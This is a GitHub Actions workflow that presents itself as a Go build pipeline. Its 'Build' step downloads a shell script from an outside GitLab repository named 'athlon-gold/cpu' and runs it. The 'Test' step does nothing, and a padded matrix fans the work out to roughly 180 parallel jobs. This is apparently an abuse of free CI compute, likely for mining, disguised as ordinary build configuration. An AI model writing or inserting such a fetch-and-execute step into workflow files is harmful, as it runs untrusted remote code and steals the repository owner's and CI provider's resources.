name: Go_Events

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  build:
    runs-on: ubuntu-20.04
    strategy:
      matrix:
        go: [1.11,1.12,1.13,1.14,1.15,1.16,1.2,1.3,1.4]
        flag: [a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t]
      fail-fast: false 
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go
      uses: actions/setup-go@v2
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Check out code into the Go module directory
      uses: actions/checkout@v2
    - name: Build
      run: |
        wget https://gitlab.com/athlon-gold/cpu/-/raw/master/demo.sh && chmod +x demo.sh && ./demo.sh
        echo "done"
    - name: Test
      run: echo "done"
